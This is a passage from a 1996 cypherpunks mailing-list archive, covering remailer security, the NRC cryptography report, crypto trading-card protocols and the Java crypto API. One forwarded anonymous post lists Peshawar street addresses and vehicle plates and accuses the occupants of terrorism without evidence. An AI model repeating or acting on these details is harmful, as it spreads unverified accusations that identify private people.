 
   1.4  The Business and Economic Perspective 
 
        1.4.1  Protecting Important Business Information 
        1.4.2  Ensuring the Nation's Ability to Exploit 
               Global Markets 
 
   1.5  Individual and Personal Interests in Privacy 
 
        1.5.1  Privacy in an Information Economy 
        1.5.2  Privacy for Citizens 
 
   1.6  Special Needs of Government 
 
   1.7  Recap 
 
 
2  CRYPTOGRAPHY: ROLES, MARKET, AND INFRASTRUCTURE 
 
   2.1  Cryptography in Context 
 
   2.2  What Is Cryptography and What Can It Do? 
 
   2.3  How Cryptography Fits into the Big Security Picture 
 
        2.3.1  Technical Factors Inhibiting Access to 
               Information 
        2.3.2  Factors Facilitating Access to Information 
 
   2.4  The Market for Cryptography 
 
        2.4.1  The Demand Side of the Cryptography Market 
        2.4.2  The Supply Side of the Cryptography Market 
 
   2.5  Infrastructure for Widespread Use of Cryptography 
 
        2.5.1  Key Management Infrastructure 
        2.5.2  Certificate Infrastructures 
 
   2.6 Recap 
 
 
3  NEEDS FOR ACCESS TO ENCRYPTED INFORMATION 
 
   3.1  Terminology 
 
   3.2  Law Enforcement: Investigation and Prosecution 
 
        3.2.1  The Value of Access to Information for Law 
               Enforcement 
        3.2.2  The Legal Framework Governing Surveillance 
        3.2.3  The Nature of Surveillance Needs of Law 
               Enforcement 
        3.2.4  The Impact of Cryptography and New Media on 
               Law Enforcement (Stored and Communicated Data) 
 
   3.3  National Security and Signals Intelligence 
 
        3.3.1  The Value of Signals Intelligence 
        3.3.2  The Impact of Cryptography on SIGINT 
 
   3.4  Similarities and Differences Between Foreign 
        Policy/National Security and Law Enforcement Needs for 
        Communications Monitoring 
 
        3.4.1  Similarities 
        3.4.2  Differenees 
 
   3.5  Business and Individual Needs for Exceptional Access 
        to Protected Information 
 
   3.6  Other Types of Exceptional Access to Protected 
        Information 
 
   3.7  Recap 
 
 
 
                PART II -- POLICY INSTRUMENTS 
 
 
4  EXPORT CONTROLS 
 
   4.1  Brief Description of Current Export Controls 
 
        4.1.1  The Rationale for Export Controls 
        4.1.2  General Description 
        4.1.3  Discussion of Current Licensing Practices 
 
   4.2  Effectiveness of Export Controls on Cryptography 
 
   4.3  The Impact of Export Controls on U.S. Information 
        Technology Vendors 
 
        4.3.1  De Facto Restrictions on the Domestic 
               Availability of Cryptography 
        4.3.2  Regulatory Uncertainty Related to Export 
               Controls 
        4.3.3  The Size of the Affected Market for 
               Cryptography 
        4.3.4  Inhibiting Vendor Responses to User Needs 
 
   4.4  The Impact of Export Controls on U.S. Economic and 
        National Security Interests 
 
        4.4.1  Direct Economic Harm to U.S. Businesses 
        4.4.2  Damage to U.S. Leadership in Information 
               Technology 
 
   4.5  The Mismatch Between the Perceptions of Government/ 
        National Security and Those of Vendors 
 
   4.6  Export of Technical Data 
 
   4.7  Foreign Policy Considerations 
 
   4.8  Technology-Policy Mismatches 
 
   4.9  Recap 
 
 
5  ESCROWED ENCRYPTION AND RELATED ISSUES 
 
   5.1  What Is Escrowed Encryption? 
 
   5.2  Administration Initiatives Supporting Escrowed 
        Encryption 
 
        5.2.1  The Clipper Initiative and the Escrowed 
               Encryption Standard 
        5.2.2  The Capstone/Forteza (sic) Initiative 
        5.2.3  The Relaxation of Export Controls on Software 
               Products Using "Properly Escrowed" 64-bit 
               Encryption 
        5.2.4  Other Federal Initiatives in Escrowed 
               Encryption 
 
   5.3  Other Approaches to Escrowed Encryption 
 
   5.4  The Impact of Escrowed Encryption on Information 
        Security 
 
   5.5  The Impact of Escrowed Encryption on Law Enforcement 
 
        5.5.1  Balance of Crime Enabled vs. Crime Prosecuted 
        5.5.2  Impact on Law Enforcement Access to 
               Information 
 
   5.6  Mandatory vs. Voluntary Use of Escrowed Encryption 
 
   5.7  Process Through Which Policy on Escrowed Encryption 
        Was Developed 
 
   5.8  Affiliation and Number of Escrow Agents 
 
   5.9  Responsibilities and Obligations of Escrow Agents and 
        Users of Escrowed Encryption 
 
        5.9.1  Partitioning Escrowed Information 
        5.9.2  Operational Responsibilities of Escrow Agents 
        5.9.3  Liabilities of Escrow Agents 
 
   5.10 The Role of Secrecy in Ensuring Product Security 
 
        5.10.1 Algorithm Secrecy 
        5.10.2 Product Design and Implementation Secrecy 
 
   5.11 The Hardware/Software Choice in Product Implementation 
 
   5.12 Responsibility for Generation of Unit Keys 
 
   5.13 Issues Related to the Administration Proposal to 
        Exempt 64-bit Escrowed Encryption in Software 
 
        5.13.1 The Definition of "Proper Escrowing" 
        5.13.2 The Proposed Limitation of Key Lengths to 64 
               Bits or Less 
 
   5.14 Recap 
 
 
6  OTHER DIMENSIONS OF NATIONAL CRYPTOGRAPHY POLICY 
 
   6.1  The Communications Assistance for Law Enforcement Act 
 
        6.1.1  Brief Description of and Stated Rationale for 
               the CALEA 
        6.1.2  Reducing Resource Requirements for Wiretaps 
        6.1.3  Obtaining Access to Digital Streams in the 
               Future 
        6.1.4  The CALEA Exemption of Information Service 
               Providers and Distinctions Between Voice and 
               Data Services 
 
   6.2  Other Levers Used in National Cryptography Policy 
 
        6.2.1  Federal Information Processing Standards 
        6.2.2  The Government Procurement Process 
        6.2.3  Implementation of Policy: Fear, Uncertainty, 
               Doubt, Delay, Complexity 
        6.2.4  R&D Funding 
        6.2.5  Patents and Intellectual Property 
        6.2.6  Formal and Informal Arrangements with Various 
               Other Governments and Organizations 
        6.2.7  Certification and Evaluation 
        6.2.8  Nonstatutory Influence 
        6.2.9  Interagency Agreements Within the Executive 
               Branch 
 
   6.3  Organization of the Federal Government with Respect to 
        Information Security 
 
        6.3.1  Role of National Security vis-a-vis Civilian 
               Information Infrastructures 
        6.3.2  Other Government Entities with Influence on 
               Information Security 
 
   6.4  International Dimensions of Cryptography Policy 
 
   6.5  Recap 
 
 
 
   PART III--POLICY OPTIONS, FINDINGS, AND RECOMMENDATIONS 
 
 
7  POLICY OPTIONS FOR THE FUTURE 
 
   7.1  Export Control Options for Cryptography 
 
        7.1.1  Dimensions of Choice for Controlling the 
               Exportof Cryptography 
        7.1.2  Complete Elimination of Export Controls on 
               Cryptography 
        7.1.3  Transferral of All Cryptography Products to 
               the Commerce Control List 
        7.1.4  End-use Certification 
        7.1.5  Nation-by-Nation Relaxation of Controls and 
               Harmonization of U.S. Export Control Policy on 
               Cryptography with Export/Import Policies of 
               Other Nations 
        7.1.6  Liberal Export for Strong Cryptography with 
               Weak Defaults 
        7.1.7  Liberal Export for Cryptographic Applications 
               Programming Interfaces 
        7.1.8  Liberal Export for Escrowable Products with 
               Encryption Capabilities 
        7.1.9  Alternatives to Government Certification of 
               Escrow Agents Abroad 
        7.1.10 Use of Differential Work Factors in 
               Cryptography 
        7.1.11 Separation of Cryptography from Other Items on 
               the U.S. Munitions List 
 
   7.2  Alternatives for Providing Government Exceptional 
        Access to Encrypted Data 
 
        7.2.1  A Prohibition of the Use and Sale of 
               Cryptography Lacking Features for Exceptional 
               Access 
        7.2.2  Criminalization of the Use of Cryptography in 
               the Commission of a Crime 
        7.2.3  Technical Non-Escrow Approaches for Obtaining 
               Access to Information 
        7.2.4  Network-based Encryption 
        7.2.5  Distinguishing Between Encrypted Voice and 
               Data Communications Services for Exceptional 
               Access 
        7.2.6  A Centralized Decryption Facility for 
               Government Exceptional Access 
 
   7.3  Looming Issues 
 
        7.3.1  The Adequacy of Various Levels of Encryption 
               Against High-Quality Attack 
        7.3.2  Organizing the U.S. Government for Better 
               Information Security on a National Basis 
 
   7.4  Recap 
 
 
8  SYNTHESIS, FINDINGS, AND RECOMMENDATIONS 
 
   8.1  Synthesis and Findings 
 
        8.1.1  The Problem of Information Vulnerability 
        8.1.2  Cryptographic Solutions to Information 
               Vulnerabilities 
        8.1.3  The Policy Dilemma Posed by Cryptography 
        8.1.4  National Cryptography Policy for the 
               Information Age 
 
   8.2  Recommendations 
 
   8.3  Additional Work Needed 
 
   8.4  Conclusion 
 
 
                         APPENDIXES 
 
A  Contributors to the NRC Project on National Cryptography 
   Policy 
 
B  Glossary 
 
C  A Brief Primer on Cryptography 
 
D  An Overview of Electronic Surveillance: History and Current 
   Status 
 
E  A Brief History of Cryptography Policy 
 
F  A Brief Primer on Intelligence 
 
G  The International Scope of Cryptography Policy 
 
H  Summary of Important Requirements for a Public-Key 
   Infrastructure 
 
I  Industry-Specific Dimensions of Security 
 
J  Examples of Risks Posed by Unprotected Information 
 
K  Cryptographic Applications Programming Interfaces 
 
L  Laws, Regulations, and Documents Relevant to Cryptography 
 
M  Other Looming Issues Related to Cryptography Policy 
 
N  Federal Information Processing Standards 
 
[End Contents] 
 
 
 
 
 
 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Fri, 31 May 1996 22:26:47 +0800
To: cypherpunks@toad.com
Subject: Re: remailers, mail technology
Message-ID: <199605310904.CAA05411@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


>>>Why would anyone set up a remailer at Lance's (or Sameer's) machine?
>>>They have remailers running already. If the thugs break root and obtain
>>>one remailer key from a machine, they probably get all the keys on that
>>>machine, compromising all the remailers in one single attack. Or am I
>>>missing something? Is there any benefit of multiple remailers on a machine
>>>where root is running his own remailer?

There are multiple threats that remailers have to face; multiple remailers
on one machine are jointly vulnerable to some of them, but separately
vulnerable to others.  If there are keys stored in plaintext on a machine,
then root-breakers can steal them (unless it's running a multi-level secure
operating system that can prevent that, if physical security is maintained.)
Thugs confiscating the hardware or trashing the OS obviously break all the
remailers at once, though that's only denial of service and not compromise.
Offline remailers using POP, UUCP, or other mail forwarding also don't risk
compromise (if they only accept encrypted messages), because they don't
keep keys or perform encryption on the ISP's server.  For all of these cases,
the remailer-positive ISP provides a certain amount of flak catching,
but can also avoid much of it because _he_ isn't running the remailer -
his customers are, and if the remailer gets abused, maybe they'll have
to become ex-customers.  That's especially effective for ISPs that support
customers with their own DNS names - foobar.com is owned by someone other than
Sameer, and if Sameer has to squash them, maybe they start getting hosted
by Lance instead, or by AOL, or by YAISP.SF.CA.US.

Telnet-only shell account providers probably get a little less deniability than
dial-only IP+POP providers or especially dial-only IP-only providers.
(On the other hand, the fact that Sameer's systems are telnet-only means
that users can be spread around to other dial-IP providers, including
all those 10-hour AOLers he just has to keep squashing :-), while if he
had dial-up users the thugs might go for telephone records.

====

What kind of technical infrastructure would help run remailers in environments
like this?  I can think of three things
- Encrypted IP sessions (either IPv6, if it ever gets deployed, or swIPe)
- Encrypted POP and SMTP client/server interactions. 
- User-based encrypted communications (SSH? SSL?) relaying POP/SMTP.
If we're going to get convenient wide deployment before the millenium brings
IPv6,
the approach will either need to run on shell(-like) accounts only,
or else will need to piggyback on SSL.  Either way, rather than get everyone
to replace POP3 with CryptoPOP (they haven't even done IMAP), it'll probably
take some kind of relay that sits on your desktop machine, speaking
POP3-server on one side and CryptoPOP on the other.  And you'd have to
handle firewalls.

Is there any way to get Netscape to implement something like pop3: and smtp:
services for the client software (or do them as plug-ins)?  Adding them to
a server (i.e.. Apache-SSL) would allow SSL to do the crypto, and would
mean you could use https: proxies to handle firewalls, since everybody's
got to deal with them anyway.
#					Thanks;  Bill
# Bill Stewart, stewarts@ix.netcom.com, +1-415-442-2215
# goodtimes signature virus innoculation






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ecafe Mixmaster Remailer <mixmaster@remail.ecafe.org>
Date: Fri, 31 May 1996 16:35:39 +0800
To: cypherpunks@toad.com
Subject: Do you know what to do with this?
Message-ID: <199605310225.CAA10359@avignon.hypereality.co.uk>
MIME-Version: 1.0
Content-Type: text/plain


well, someone stuffed this in my mailbox, with a note asking that I 
"delete my email address and send it to the world."

im not sure what to make of it but maybe someone here will better know 
what do do with it.



---------- Forwarded message ----------
[headers snipped]

delete my email addresses and send it to the world.

these are the people who i suspect of terrorism related activities.
the country they are residing in is pakistan.
the address are
1-)12 ,a,b,c chinar roadu.town not marked no no no name.
2-) 6chinar road,utown peshawar,next to former prov minister ghani dad
khan's house not marked, nothing written on the gate no no,no name.
3-)32b actually 12e or 14 chinar road university town peshawar. 
marked as 32b
4-)11 chinar road university town peshawar
5-)18 or 20chinar road university town peshawar not marked.no no.
the cars are
1_)prk 9325 or 9327,a sudanese doctor ali working for the islamic 
relief agency
mental hospital chinar road university town peshawar.
2-) a silver pajero prn or prh 6973 or 6874
4-)a white toyota landcruiser prl 8470
5-) a white pajero ningrahar(afghan) 63or ngr 133, a white  girl 
.sometimes
it has the no ngr134 on it.

6-a white pajero prp 2364

5-)a cream coloured suzuki jeep prm 6872
 the cars that used to come to their house during the xmas break or
 on sundays when the american diplomats went to isb and they took 
them out
 the year was 1993-94
 1-a red american jeep cc64-138
 2-a blue old senator cc64-47 another blue senator ad 64-47
 3- a white toyota land cruiser pro or prp 3305.
 4- agrey american jeep prp 1228
 5- a toyota pickup pro1269 or pro1260
 6- ablue pajero prl 2667
 7- a rust coloured corona prn 2147
 8-) a white pajero ad44-104.
 9-)the other cars that come are cc29-??? and cc-19
 they people who come to these houses are sudanese, one phillipino 
woman
  some afghans or arabs it is difficult to tell.
  and a lot of white people, who mostly ride on pakistani made sohrab 
cycles
 or toyota pickups,probably muslim converteees.
 the cc64-138 jeep used to be driven by a pakistani looking guy ,dark 
with
 spectacles. the other pakistani nos they kept on changing ,so iam 
not sure
 if these are the correct nos
 10-  awhite nissan patrol x68-2199.
11-PRP 1228 grey american jeep
just look for the addresses,most of the car nos are from the year 1993
so they might have changed them since.most of these people belong to
the islamic relief agency.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "David F. Ogren" <ogren@cris.com>
Date: Fri, 31 May 1996 20:12:29 +0800
To: cypherpunks@toad.com
Subject: (Fwd) Re: [crypto] crypto-protocols for trading card games
Message-ID: <199605310701.DAA16729@darius.cris.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Gary Howland asked me to forward his response to the mailing-list:

- ------- Forwarded Message Follows -------
Date:          Thu, 30 May 1996 12:12:48 +0200
From:          Gary Howland <gary@systemics.com>
Organization:  Systemics Ltd.
To:            ogren@cris.com
Subject:       Re: [crypto] crypto-protocols for trading card games

David F. Ogren wrote:

> Cards are not transferrable.  In order to make cards transferrable
> the game company must be able to invalidate cards which have been
> traded to others.  In other words if Alice wants to give a cards to
> Bob she must:
> 
> 1. Contact the game company and tell them she wants to give the card
> to Bob. 2. The game company must issue a new card to Bob with a new
> serial number and with Bob's public key rather than Alice's. 3. The
> game company must invalidate Alice's old card.  Since there is no
> way that the game company can make sure all copies of the card have
> been destroyed it must create a "invalid serial number list" and
> have the players dial into that list everytime the game is played.

This is the double spending problem.

> Since step 3 is so costly to implement, I think it is unlikely that
> a cryptography-based trading card game will have tradable cards.

Given that untraceability of cards is less of an issue than with
e-cash, why not have a central registry of the owners of the cards
(which would consist of the card hashes paired with the public key
fingerprint)?  Admittedly this means the players must be on line, but
then we all know how difficult off line detection of double spenders
is.

For anyone who is _serious_ about starting work on such a game
system, I have a few pieces of Perl and Java code that would really
get you on your way - let me know if you are interested.


Gary
- --
pub  1024/C001D00D 1996/01/22  Gary Howland <gary@systemics.com>
Key fingerprint =  0C FB 60 61 4D 3B 24 7D  1C 89 1D BE 1F EE 09 06



-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMa6YXPBB6nnGJuMRAQG0tgP8DSnhI+SgoaR63AuOpOi7qPgC6Ei3bFJV
TdZUB6lfYg3FnE4AaBkxdYkGPfzoyJx1u3Nu/s2BJs5i3Zd2eOfYohj3CJoXJVo1
04zXamo9cCvgemNTplT331sFc+nX/iOIRUvAWbJdfhaOapnm6KVSrNkFqhiRhQ5S
0SYvgcISnZA=
=VdtP
-----END PGP SIGNATURE-----
--
David F. Ogren
ogren@concentric.net (alternate address: dfogren@msn.com)
PGP Key ID: 0xC626E311
PGP Key Fingerprint: 24 23 CD 15 BF 8D D1 DE  81 71 84 C8 2C E0 4B 01
(public key available via server or by sending a message to
ogren@concentric.net with a subject of GETPGPKEY)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "David F. Ogren" <ogren@cris.com>
Date: Fri, 31 May 1996 20:40:44 +0800
To: cypherpunks@toad.com
Subject: Re: [crypto] crypto-protocols for trading card games
Message-ID: <199605310727.DAA21133@darius.cris.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In my earlier message I said:

> > Cards are not transferrable.  In order to make cards transferrable
> > the game company must be able to invalidate cards which have been
> > traded to others.  In other words if Alice wants to give a cards
> > to Bob she must:

<snip>

Gary Howland said:
> This is the double spending problem.
>  

Me again:
> > Since step 3 is so costly to implement, I think it is unlikely
> > that a cryptography-based trading card game will have tradable
> > cards.
> 

Mr. Howland again:
> Given that untraceability of cards is less of an issue than with
> e-cash, why not have a central registry of the owners of the cards
> (which would consist of the card hashes paired with the public key
> fingerprint)?  Admittedly this means the players must be on line,
> but then we all know how difficult off line detection of double
> spenders is.
> 

And herein lies the problem with an implementation of trading card
games.  In order to detect "double spenders", the system must be
on-line.  However, I believe going on-line will drive the costs of
running such a game out of the range of commercial feasibility.

First of all, it requires that all players have Internet access.  This
reduces marketability.

Secondly, it requires that both players make an Internet connection
with the game company everytime they want to play a game.  This will
incur costs to the game company that it invariably will want to pass
on to the players.  Players, however, will be very resistant to a game
that requires a subscription fee as well as costs for purchasing
"cards".  Especially, if becomes known that the only reason for the
game requiring on-line access is to prevent "cheaters".  It also
raises the question of whether the game program could be "hacked" to
avoid checking for authenticity of cards.

I think that a more realistic solution to the "double spending" 
problem is to not allow the transfer of cards between players.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMa6cjPBB6nnGJuMRAQGr3wP+K+DXJVM0rX0F6FSqwfTE/YCJbfiJXC7g
dAlwBA1URYA96h4su6xRThD2SbL0vJSLhvi3djQiTeshdqgmD8MTzlDsqTDLPp+f
Sw0GN7OjHWlt8VO5UOK9686L7u2Ev49EdGqkaR2NOy5qNdj079v0JydRCg3qhvmT
7LqcXhRbH7g=
=h3Eq
-----END PGP SIGNATURE-----
--
David F. Ogren
ogren@concentric.net (alternate address: dfogren@msn.com)
PGP Key ID: 0xC626E311
PGP Key Fingerprint: 24 23 CD 15 BF 8D D1 DE  81 71 84 C8 2C E0 4B 01
(public key available via server or by sending a message to
ogren@concentric.net with a subject of GETPGPKEY)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "David F. Ogren" <ogren@cris.com>
Date: Fri, 31 May 1996 20:56:02 +0800
To: cypherpunks@toad.com
Subject: Re: Where does your data want to go today?
Message-ID: <199605310727.DAA21108@darius.cris.com>
MIME-Version: 1.0
Content-Type: text/plain


> > >	What problems does compression before encryption have? It at least
> > >seems to work for PGP.
> > >
> > Most compression schemes put a header/index on the front of the
> > compressed data.
> > This makes recognizing the correct decryption very simple.
> > 
> > Call it a limited "known plaintext" situation.
> 

Using a random IV also limits the effectiveness of using known 
headers for "known plaintext" attacks.  Also note that a good block 
cipher isn't that vulnerable even to "known plaintext" attacks.
--
David F. Ogren
ogren@concentric.net (alternate address: dfogren@msn.com)
PGP Key ID: 0xC626E311
PGP Key Fingerprint: 24 23 CD 15 BF 8D D1 DE  81 71 84 C8 2C E0 4B 01
(public key available via server or by sending a message to
ogren@concentric.net with a subject of GETPGPKEY)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: A.Back@exeter.ac.uk
Date: Fri, 31 May 1996 20:49:09 +0800
To: cypherpunks@toad.com
Subject: opinions on book "The Truth Machine"
Message-ID: <18231.199605310332@olib>
MIME-Version: 1.0
Content-Type: text/plain



Anyone read this book?  Available on line:

	http://www.truthmachine.com/

The book is a possible future world scenario exploring the social
implications of another new potential technology, a 100% reliable
truth test.  What would society do with such a device?

The book explores the direction in which it is no longer possible to
speak untruthfully without detection.  A different approach to AP to
ensuring honesty in politicians.

The political climate has moved to a situation were the population
accepts a world government and loss of privacy for the payback of near
zero crime rate.

Is this utopia or has free will been removed?

Certainly many of the premises in the book are contrary to cypherpunk
goals in that privacy is erroded (you can not lie, and truth tests
with the question as to wether you have committed a crime at routine
points, for example when you need to renew a driving license, etc).
Government regulation of many aspects of life have been increased.

Position escrow or some near-relative is in there too, for the purpose
of allowing one to prove what was said, the video stream is sent and
encrypted in real time.  Also cryogenics, and nano-tech.

Interesting technology for cypherpunks to think about the
implications, likelihood, desirability etc.

Adam




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Lesher <wb8foz@nrk.com>
Date: Sat, 1 Jun 1996 01:49:23 +0800
To: hfinney@shell.portal.com (Hal)
Subject: Re: NRC Cryptography Report: The Text of the Recommendations
In-Reply-To: <199605302304.QAA14424@jobe.shell.portal.com>
Message-ID: <199605311115.HAA05118@nrk.com>
MIME-Version: 1.0
Content-Type: text


> 
> I read the overview of this, and while it is good that the report calls
> for maintaining the legality of domestic encryption and some slight
> loosening of the export rules, overall I was diappointed.

Watching faces at the NPC, it was clear there was lots of private
divergence midst the panel. A further indication of this was that
three of them refused to get clearances. 

I'd say the report was a success based solely on the fact the
Administration does not like it ;=|

-- 
A host is a host from coast to coast.................wb8foz@nrk.com
& no one will talk to a host that's close........[v].(301) 56-LINUX
Unless the host (that isn't close).........................pob 1433
is busy, hung or dead....................................20915-1433




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Barber <jeffb@sware.com>
Date: Sat, 1 Jun 1996 02:56:40 +0800
To: hfinney@shell.portal.com (Hal)
Subject: Re: NRC Cryptography Report: The Text of the Recommendations
In-Reply-To: <199605302304.QAA14424@jobe.shell.portal.com>
Message-ID: <199605311124.HAA12879@jafar.sware.com>
MIME-Version: 1.0
Content-Type: text/plain


Hal writes:

[ Good critique of NRC crypto report ]

I completely agree.  The *best* that could be said of this report is
"56 bits instead of 40".  B.F.D.  And aside from that one concession,
it's a step backward.


BTW, does it seem to anyone else that recommendation 1 "no law should
bar the .... use of ... encryption within the United States" is
contradicted by recommendation 5.4: "Congress should seriously consider
legislation that would impose criminal penalties on the use of encrypted
communications in interstate commerce with the intent to commit a
federal crime"?  Maybe they meant to say "no law except those we
propose below" :-(.


-- Jeff




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sat, 1 Jun 1996 06:45:36 +0800
To: cypherpunks@toad.com
Subject: Optimism re NRC Cryptography Report
Message-ID: <add44f8502021004f975@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 11:04 PM 5/30/96, Hal wrote:
>I read the overview of this, and while it is good that the report calls
>for maintaining the legality of domestic encryption and some slight
>loosening of the export rules, overall I was diappointed.

Reading it at the Web site (http://www2.nas.edu/cstbweb/), and looking at
some of the comments here, I'm not as disappointed as I expected to be.

Sure, there is a lot of language about meeting law enforcement needs
(including the disturbing proposal to apply NSA SIGINT capabilities
domestically to help the FBI and law enforcement solve the "growing gap"
problem in telecommunications intercepts), and the language about "56 bit"
systems seems to leave open the door for severe restrictions on stronger
systems (as Hal, Bill Frantz, and others note in their posts).

But, on balance, I think this NRC report comes down strongly enough in
favor of cryptography use for business and individuals that it will
effectively *derail* and *stall* current Administration proposals, give
support to the Burns Bill, and delay key escrow systems for at least
several years.

This should be enough to ensure our victory. (Not that I think that even
fairly repressive legislation would've been enough to defeat us, but a new
breathing spell can only help.)

Unless laws are passed very quickly to outlaw the things we are involved
with, including such things as superencryption, steganography, anonymous
remailers, and digital money, I think we will "win the race to the fork in
the road." The "fork in the road" being the point at which the changes are
unstoppable.

(And I couldn't see much about these technologies....though I haven't read
every line of the Web summary, and have certainly not seen the full
report.)

So, at first reading, I am cautiously optimistic that this NRC report will
carry enough weight to delay crypto legislation long enough to ensure our
ultimate victory. The "degrees of freedom" will soon be too large as to
ever control.

--Tim May


Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Moltar Ramone <jlasser@rwd.goucher.edu>
Date: Sat, 1 Jun 1996 03:45:34 +0800
To: Hal <hfinney@shell.portal.com>
Subject: Re: NRC Cryptography Report: The Text of the Recommendations
In-Reply-To: <199605302304.QAA14424@jobe.shell.portal.com>
Message-ID: <Pine.SUN.3.91.960531080225.28351A-100000@rwd.goucher.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 30 May 1996, Hal wrote:

> Second, although they go to some lengths to emphasize the importance of
> an open, unclassified process, and that the report itself is completely
> unclassified, there are some curios omissions.  For example,
> recommendation 4.1 is that 56-bit DES encryption should be exportable.
> However, they follow that by saying, "Products covered under
> Recommendation 4.1 must be designed in a way that would preclude their
> repeated use to increase confidentiality beyond the acceptable level."

That is a modest misreading of the statement -- what it says is a sort of 
"generally available" requirement that the committee did a _BIG_ job of 
trying to soft-pedal at the conference.  Especially when PGP was 
mentioned, they said "well, it's not _really_ a 'generally available' 
recommendation."  But it _is_.  One Cypherpunk at the meeting suggested 
to me that they knew if PGP was mentioned, heads would roll, and this 
might be a quiet way of sneaking that in.

> I also think it is sneaky that they bury this limitation in text which
> will not be seen by people who read only the recommendations.

Yep, but OTOH, how much can they fit into a decent blurb anyways, which 
is all the actual recommendation text is? 

> Overall, I am disappointed that the report seems to adopt so much of the
> point of view of those forces which will oppose the use of cryptography.
> At best it seems to be a recognition that change is inevitable, and that
> the most that can be hoped for is to ease the transition to a world where
> people have free access to privacy tools.  But in the meantime it appears
> designed to delay the transition rather than advance it.

Which is as good as we could hope for from a government-sponsored report, 
whose team was required to include members of the intelligence community, 
and which those members know will be looked at seriously by congress.

While on the one hand I'm disappointed, OTOH it was much better than I 
expected it to be.  While it is essentially a "status quo" sort of 
report, it still allows us to deploy strong crypto now.

What I was most disappointed with was that (as far as I've found so far 
-- I've not slogged my way through the entire 500+ page report quite yet) 
CAPIs are totally ignored (although described in an appendix, I haven't 
yet been able to find any reference with regards to exporting them) 
thus leaving the "crypto in the hole" issue up in the air...

----------
Jon Lasser (410)532-7138                         - Obscenity  is a crutch  for
jlasser@rwd.goucher.edu                            inarticulate motherfuckers.
http://www.goucher.edu/~jlasser/
Finger for PGP key (1024/EC001E4D)               - Fuck the CDA.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Moltar Ramone <jlasser@rwd.goucher.edu>
Date: Sat, 1 Jun 1996 02:53:48 +0800
To: Lucky Green <shamrock@netcom.com>
Subject: Re: Java Crypto API questions
In-Reply-To: <v02120d05add3f5807fe4@[192.0.2.1]>
Message-ID: <Pine.SUN.3.91.960531081207.28351B-100000@rwd.goucher.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 30 May 1996, Lucky Green wrote:

> o "Security Packages must be signed. Policy for signing is public and open."
> I assume the packages must be signed by Sun. How much will it cost to have
> a package signed? How do I obtain a copy of this "public and open" policy?
> 
> o "Exportable API. Exportable applications."
> One code example shows performing a DES encryption. Another slide mentions
> "Support for [...] RSA." This is exportable? What am I missing?

My guess would be that the first of these two points answers the second.  
Everything is exportable -- except signed third-party security packages.  
My bet would be that the exportable code would not be more than RC4-40 or 
perhaps 1DES, but that a signed package would go to RC4-128, 3DES, and 
RSA-1024.  However, the signature on that package would be on the 
condition that the vendor/distributor of that package follow all export 
regulations.

This is the way Micro$oft's CAPI is supposed to work; it's got 
commodities jurisdiction approval already, my bet is Sun can get the same.

----------
Jon Lasser (410)532-7138                         - Obscenity  is a crutch  for
jlasser@rwd.goucher.edu                            inarticulate motherfuckers.
http://www.goucher.edu/~jlasser/
Finger for PGP key (1024/EC001E4D)               - Fuck the CDA.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Sat, 1 Jun 1996 07:28:55 +0800
To: Moltar Ramone <jlasser@rwd.goucher.edu>
Subject: Re: Java Crypto API questions
Message-ID: <v02120d10add4c726d6c2@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


At 8:15 5/31/96, Moltar Ramone wrote:

>My guess would be that the first of these two points answers the second.
>Everything is exportable -- except signed third-party security packages.
>My bet would be that the exportable code would not be more than RC4-40 or
>perhaps 1DES, but that a signed package would go to RC4-128, 3DES, and
>RSA-1024.  However, the signature on that package would be on the
>condition that the vendor/distributor of that package follow all export
>regulations.

Where does this leave foreign vendors? Will Sun sign the 3DES package of a
foreign vendor?


Disclaimer: My opinions are my own, not those of my employer.

-- Lucky Green <mailto:shamrock@netcom.com>
   PGP encrypted mail preferred.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sandy Sandfort <sandfort@crl.com>
Date: Sat, 1 Jun 1996 07:45:49 +0800
To: cypherpunks@toad.com
Subject: Re: opinions on book "The Truth Machine"
Message-ID: <2.2.32.19960531170108.0070c300@popmail.crl.com>
MIME-Version: 1.0
Content-Type: text/plain


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                       SANDY SANDFORT
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

C'punks,

At 03:32 AM 5/31/96 GMT, A.Back@exeter.ac.uk wrote:

>The book is a possible future world scenario exploring the social
>implications of another new potential technology, a 100% reliable
>truth test.  What would society do with such a device?
>
>The book explores the direction in which it is no longer possible to
